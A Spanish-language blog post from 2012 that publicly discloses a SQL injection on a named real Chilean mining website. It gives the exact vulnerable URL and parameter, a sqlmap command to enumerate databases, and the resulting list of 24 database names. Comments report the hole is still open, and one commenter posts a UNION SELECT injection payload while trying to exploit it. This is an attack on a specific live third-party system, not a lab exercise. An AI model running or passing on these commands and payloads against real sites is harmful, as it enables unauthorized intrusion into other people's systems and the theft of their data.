martes, 12 de junio de 2012

SQL Injection Minería de Chile


Hola, bueno en esta oportunidad, me tope con un sitio web que a simple vista parece ser muy segura, por su infraestructura y sus diseños; pero también cabe recalcar que los sitios webs por mas "bonito" que se vea no son 100% segura.

Basándome en eso y viendo que es una web de la MINERÍA CHILENA, empece a ver sus módulos, links externos, etc... llegando así a encontrar una SQL Injection, en unos de sus módulos como es la de /revistas.

Actualmente el 70% de sitios webs son vulnerables a este tipo de bug (SQL) la cual los programadores que realizan el trabajo de crear el sitio web y programarla para que no tenga ninguna vulnerabilidad; solo crean la web y nunca mas la actualizan, dado asi que siempre están y estaran vulnerable.

Bueno, veamos un poco mas a fondo de esta vulnerabilidad en la MINERÍA CHILENA:


Target: http://www.mch.cl/
Link Vulnerable: http://www.mch.cl/revistas/index_neo.php?id=1
Vulnerabilidad: SQL Injection

Veamos su base de datos desde el SQLMAP:

./sqlmap.py -u http://www.mch.cl/revistas/index_neo.php?id=1 --dbs

available databases [24]:
[*] 15a0
[*] agroeconomico
[*] christensen
[*] conferencias
[*] correos
[*] elecgas
[*] electricidad
[*] enviomail
[*] eventos
[*] ftpserver
[*] information_schema
[*] joomla
[*] latinomineria
[*] mch
[*] megaminas
[*] minisitio_exploracion
[*] mysql
[*] renovacion
[*] reportes
[*] sugarCE
[*] sustentare
[*] sutmin
[*] test
[*] vendimia

La vulnerabilidad ya ha sido reportada & ando esperando alguna respuesta.

Saludos.





4 comentarios:

  1. :) revise hoy la vulnerabilidad y aun sigue, no ah sido reparada :D eh aprendido mucho en tu blog.

    Saludos

    ResponderEliminar
  2. aun esta la vulnerabilidad, no le han hecho nada xD revise todo.que penca que siendo mas encima una pagina de minera de chile no le pongan atencion
    a algo tan basico como puede ser tu propia web. sistema penca.

    ResponderEliminar
  3. Todavía está la weá, jajajaja XD.

    ResponderEliminar
  4. -1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35.............en cual se vulnera aun no la vulnero

    ResponderEliminar